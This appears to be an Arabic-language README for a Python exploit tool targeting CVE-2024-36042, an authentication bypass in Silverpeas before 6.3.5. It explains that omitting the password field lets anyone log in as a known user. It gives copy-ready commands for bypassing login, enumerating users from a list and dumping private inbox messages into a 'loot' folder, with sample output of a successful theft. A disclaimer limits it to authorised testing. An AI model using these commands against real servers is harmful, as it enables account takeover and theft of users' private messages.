
PoC بلغة بايثون لثغرة تجاوز المصادقة CVE-2024-36042 في Silverpeas < 6.3.5. تشمل الميزات كشف الإصدار، تعداد المستخدمين متعدد الخيوط، استخراج الرسائل، وإعداد تقارير منظمة لاختبارات الأمان المصرح بها.
نص برهان مفهوم (PoC) نظيف واحترافي بلغة Python3 لثغرة CVE-2024-36042 — وهي تجاوز للمصادقة في Silverpeas < 6.3.5 ناتج عن غياب التحقق من كلمة المرور في
AuthenticationServlet.
يستقبل Silverpeas AuthenticationServlet طلب تسجيل الدخول حتى عندما يكون معامل Password محذوفًا من جسم طلب POST، مما يمنح وصولًا بجلسة مصادقة إلى أي اسم مستخدم معروف. تعرض هذه الأداة الثغرة بمسؤولية من خلال إطار استغلال معياري متعدد الخيوط مزود باكتشاف متقدم، واستخراج بيانات، وإنشاء تقارير احترافية.
المتأثر: Silverpeas < 6.3.5
CVE: CVE-2024-36042
GHSA: GHSA-qvh3-8c57-gp4m
git clone https://github.com/YOURNAME/Silverpeas-AuthBypass-CVE-2024-36042.git
cd Silverpeas-AuthBypass-CVE-2024-36042
pip install requests beautifulsoup4
python3 CVE-2024-36042.py -t http://TARGET:8080 --dump-messages
python3 CVE-2024-36042.py -t http://TARGET:8080 -u admin --dump-messages --message-output both
python3 CVE-2024-36042.py -t http://TARGET:8080 --userlist users.txt --dump-messages --message-output files --output-format md --outdir ./loot
python3 CVE-2024-36042.py -t http://TARGET:8080 --check-version --no-exploit
python3 CVE-2024-36042.py -t http://TARGET:8080 --proxy http://127.0.0.1:8080 --dump-messages --save-raw-html
تدعم الأداة أربعة أوضاع مخرجات أساسية للرسائل المفرّغة عبر --message-output:
console (الافتراضي): يطبع الرسائل المنظفة مباشرة إلى الطرفية مع تمييز الكلمات المفتاحية.markdown: ينشئ تقريرًا واحدًا {username}_messages.md لكل حساب في دليل المخرجات.files: ينشئ مجلدًا لكل حساب ويحفظ كل رسالة كملف فردي (مثل message_0006.md) بمعرّفات مبطّنة بالأصفار لترتيب نظيف في نظام الملفات.both: يجمع بين وضعي console و markdown.outdir/
├── SilverAdmin/
│ ├── message_0001.md
│ ├── message_0002.md
│ ├── raw/ (optional: --save-raw-html)
│ │ └── msg_1.html
│ └── session_cookies.txt
├── scr1ptkiddy/
│ ├── messages.md
│ └── session_cookies.txt
└── summary.json
-t, --target Base URL of Silverpeas (required)
-u, --user Single username to target
--userlist File with one username per line
--dump-messages Scrape and display inbox messages
--max-id Max message ID to check (default: 50)
--threads Concurrent workers (default: 5)
--proxy HTTP proxy URL
--message-output Output mode: {console, markdown, files, both}
--output-format File format: {md, txt}
--json Export full JSON report
--csv Export CSV of scraped messages
--outdir Output directory for exports
--no-color Disable ANSI color output (useful for logs)
--save-raw-html Save original HTML responses for debugging
--check-version Fingerprint version only
--no-exploit Skip exploitation (pair with --check-version)
--quiet, -q Minimal output
--no-banner Suppress banner
[*] Target : http://10.49.169.44:8080
[*] Version : 6.3.1
[+] Version 6.3.1 < 6.3.5 - vulnerable.
[*] Trying: scr1ptkiddy
[+] BYPASSED -> scr1ptkiddy
[+] Data saved to ./scr1ptkiddy
────────────────────────────────────────────────────────────────────
Execution Summary
────────────────────────────────────────────────────────────────────
┌───────────────┬──────────┬──────────┐
│ Account │ Status │ Messages │
├───────────────┼──────────┼──────────┤
│ scr1ptkiddy │ SUCCESS │ 6 │
│ admin │ FAILED │ 0 │
└───────────────┴──────────┴──────────┘
[+] JSON report -> ./report_20260516_013210.json
هذا المستودع جزء من ملف أعمالي في مجال الأمن الهجومي. وهو يوضح:
هذه الأداة مُقدَّمة لأغراض اختبار الأمان المصرح به والبحث والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. احصل دائمًا على إذن صريح قبل اختبار أي بنية تحتية لا تملكها.
MIT
| الميزة | الوصف |
|---|
| اكتشاف الإصدار | تحديد إصدار Silverpeas وحالة الثغرة قبل الاستغلال. |
| متعدد الخيوط | تعداد متزامن للمستخدمين عبر ThreadPoolExecutor مع مخرجات آمنة للخيوط. |
| اكتشاف متقدم | اكتشاف نقاط النهاية متعدد اللغات (الإنجليزية/الفرنسية) مع فحص متعدد المعرّفات. |
| استخراج البيانات | تفريغ رسائل عالي الدقة مع إزالة التكرار وتصفية القوالب النمطية. |
| مخرجات مرنة | دعم لوحدة التحكم وتقارير Markdown وتصدير ملفات فردية (.md أو .txt). |
| الوكيل والتنقيح | التوجيه عبر Burp/ZAP (--proxy) وحفظ HTML الخام لتنقيح المحلل اللغوي. |
| تجربة استخدام نظيفة | جداول ملخص ASCII، وتمييز الكلمات المفتاحية، والتحكم الاختياري بألوان ANSI. |